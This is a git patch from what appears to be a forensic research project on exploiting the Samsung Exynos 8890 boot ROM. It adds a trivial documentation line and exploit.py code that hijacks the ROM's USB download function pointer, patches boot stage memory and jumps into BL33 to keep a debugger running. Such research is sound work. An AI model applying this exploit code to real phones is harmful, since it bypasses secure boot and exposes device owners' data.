From 201e8485e86594cb9ad5b1ac24fa4b4c9c64af19 Mon Sep 17 00:00:00 2001
From: Jonathan Herrewijnen <j.herrewijnen@nfi.nl>
Date: Mon, 16 Sep 2024 10:52:44 +0200
Subject: [PATCH] Minor docs update and exploit.py update

---
 .../BootROM_8890/03_exploit_boot_chain.rst    |  2 ++
 source/exploit/exploit.py                     | 24 +++++++++++++++++--
 2 files changed, 24 insertions(+), 2 deletions(-)

diff --git a/documentation/source/BootROM_8890/03_exploit_boot_chain.rst b/documentation/source/BootROM_8890/03_exploit_boot_chain.rst
index 7803063..0dba7ee 100644
--- a/documentation/source/BootROM_8890/03_exploit_boot_chain.rst
+++ b/documentation/source/BootROM_8890/03_exploit_boot_chain.rst
@@ -154,8 +154,10 @@ We searched for quite some time for a space which was both writeable and executa
 
 Python part
 ^^^^^^^^^^^
+Python code to setup the debugger.
 
 .. code-block:: python
+
     # Setup initial debugger
     self.setup_guppy_debugger()
     self.cd.arch_dbg.state.auto_sync = False
diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py
index bfdf742..bb01ba5 100644
--- a/source/exploit/exploit.py
+++ b/source/exploit/exploit.py
@@ -774,8 +774,8 @@ class ExynosDevice():
         # Restore bootflow
         # self.cd.memwrite_region(0x020200dc, p32(hijacked_fun))
         
-        # Restore this to 
-        self.cd.restore_stack_and_jump(hijacked_fun)
+        # Disable this to keep access to the debugger after senindg the next stage
+        # self.cd.restore_stack_and_jump(hijacked_fun)
 
         # ==== Stage 5  ====
         stage4 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()  
@@ -789,6 +789,26 @@ class ExynosDevice():
         # assert len(stage4) == stage4_len, "Invalid stage4 length"
 
         self.send_normal_stage(stage4)
+
+        # TRYOUT PATCHING BL33
+        # BL1 is loaded, now authenticate and patch it
+        auth_bl1(DEBUGGER_ADDR)
+        self.usb_write(b"FLSH") # Flush cache (Frederic does this..)
+
+        # Hijack ROM download function
+        hijacked_fun = u32(self.cd.memdump_region(0x020200dc, 4)) 
+        self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # hijack ROM_DOWNLOAD_USB for BL31
+        self.cd.memwrite_region(0x02021880, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br"))
+
+        # Jump into BL1 (sboot.bin.1.bin)
+        JUMP_BL33 = 0x8f000000
+        def jump_bl33(lr):
+            self.cd.arch_dbg.state.LR = lr
+            self.cd.restore_stack_and_jump(JUMP_BL33)
+
+        # And jump into BL1 to execute it
+        jump_bl33(DEBUGGER_ADDR)
+
         time.sleep(2)
 
         pass